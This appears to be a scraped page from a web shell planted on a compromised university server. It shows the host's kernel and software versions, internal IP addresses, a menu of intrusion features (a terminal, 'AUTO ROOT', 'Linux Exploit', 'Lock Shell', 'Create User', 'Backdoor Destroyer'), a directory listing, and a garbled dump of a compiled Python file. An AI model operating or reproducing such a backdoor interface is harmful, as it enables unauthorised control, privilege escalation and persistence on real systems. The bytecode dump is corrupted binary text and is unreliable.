Linux ns1.utparral.edu.mx 6.8.0-79-generic #79~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Fri Aug 15 16:54:53 UTC 2 x86_64
Apache/2.4.58 (Unix) OpenSSL/1.1.1w PHP/8.2.12 mod_perl/2.0.12 Perl/v5.34.1
: 10.10.1.9 | : 10.10.1.254
Cant Read [ /etc/named.conf ]
daemon
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
README
+ Create Folder
+ Create File
/
usr /
lib /
python3.10 /
urllib /
__pycache__ /
[ HOME SHELL ]
Name
Size
Permission
Action
error.cpython-310.pyc
2.79
KB
-rw-r--r--
__init__.cpython-310.pyc
131
B
-rw-r--r--
parse.cpython-310.pyc
34.05
KB
-rw-r--r--
request.cpython-310.pyc
69.67
KB
-rw-r--r--
response.cpython-310.pyc
3.39
KB
-rw-r--r--
robotparser.cpython-310.pyc
7.16
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : robotparser.cpython-310.pyc
o � i�$ � @ s\ d Z ddlZddlZddlZdgZe�dd�ZG dd� d�ZG dd� d�Z G d d � d �Z dS )a% robotparser.py Copyright (C) 2000 Bastian Kleineidam You can choose between two licenses when using this package: 1) GNU GPLv2 2) PSF license for Python 2.2 The robots.txt Exclusion Protocol is implemented as specified in http://www.robotstxt.org/norobots-rfc.txt � N�RobotFileParser�RequestRatezrequests secondsc @ sr e Zd ZdZddd�Zdd� Zdd� Zd d � Zdd� Zd d� Z dd� Z dd� Zdd� Zdd� Z dd� Zdd� ZdS )r zs This class provides a set of methods to read, parse and answer questions about a single robots.txt file. � c C s2 g | _ g | _d | _d| _d| _| �|� d| _d S )NFr )�entries�sitemaps� default_entry�disallow_all� allow_all�set_url�last_checked��self�url� r �)/usr/lib/python3.10/urllib/robotparser.py�__init__ s zRobotFileParser.__init__c C s | j S )z�Returns the time the robots.txt file was last fetched. This is useful for long-running web spiders that need to check for new robots.txt files periodically. )r �r r r r �mtime% s zRobotFileParser.mtimec C s ddl }|� � | _dS )zYSets the time the robots.txt file was last fetched to the current time. r N)�timer )r r r r r �modified. s zRobotFileParser.modifiedc C s&